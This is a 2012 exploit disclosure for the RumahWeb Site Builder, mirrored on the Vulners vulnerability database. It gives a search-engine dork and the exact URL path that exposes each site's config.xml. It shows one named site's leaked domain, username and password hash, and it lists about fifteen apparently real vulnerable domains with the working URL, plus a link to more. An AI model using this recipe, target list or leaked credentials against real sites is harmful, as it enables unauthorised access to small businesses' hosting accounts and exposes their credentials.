Vulners
Lucene search
Site Builder RumahWeb File Disclosure
`==========================================================================================
Site Builder RumahWeb Arbitrary Config File Disclosure Vulnerability
==========================================================================================
:----------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : Site Builder RumahWeb Arbitrary Config.xml Disclosure Vulnerability
: # Date : 08 Desember 2012
: # Author : X-Cisadane and Xevil (Tomi Zaoldyeck)
: # Vendor : Rumah Web http://www.rumahweb.com/layanan/sitebuilder
: # Version : ALL
: # Category : Web Applications
: # Vulnerability : Arbitrary Config File Disclosure Vulnerability
: # Tested On : Mozilla Firefox 16.0.2 (Windows XP SP 3 32-Bit English)
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabar Cyber, Winda Utari
:----------------------------------------------------------------------------------------------------------------------------------------:
DORKS
=====
intext:sitebuilder rumahweb
Proof of Concept
================
[!] site/data/config/config.xml
For example you've searched it on google and got the result www.kratontour.com/admin
Change the URL to www.kratontour.com/data/config/config.xml
-------[ Content of www.kratontour.com/data/config/config.xml ] ----------------------
This XML file does not appear to have any style information associated with it. The document tree is shown below.
<rows>
<domain>kratontour.com</domain>
<username>krato125</username>
<password>8889720046a32ce05e438c17c004af01</password>
</rows>
-------------------------------------------------------------------------------------
Or you got toyohashi-mosque.org/admin and you have to change the URL to oyohashi-mosque.org/data/config/config.xml
Example :
http://11focus.com/data/config/config.xml
http://711pictures.com/data/config/config.xml
http://7oktav.com/data/config/config.xml
http://afindoguesthouse.com/data/config/config.xml
http://alltranss.com/data/config/config.xml
http://altranpumpjaya.com/data/config/config.xml
http://amanahhusada.com/data/config/config.xml
http://anterotour.com/data/config/config.xml
http://ariaribatik.com/data/config/config.xml
http://asthaoilwellservices.com/data/config/config.xml
http://ayalasbutiq.com/data/config/config.xml
http://baccojakarta.com/data/config/config.xml
http://bbayamm.com/data/config/config.xml
http://bibi-laundry.com/data/config/config.xml
http://bimadrillingtools.com/data/config/config.xml
More results? http://pastebin.com/4VZpiC7e
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Dec 2012 00:00Current
0.1Low risk
Vulners AI Score0.1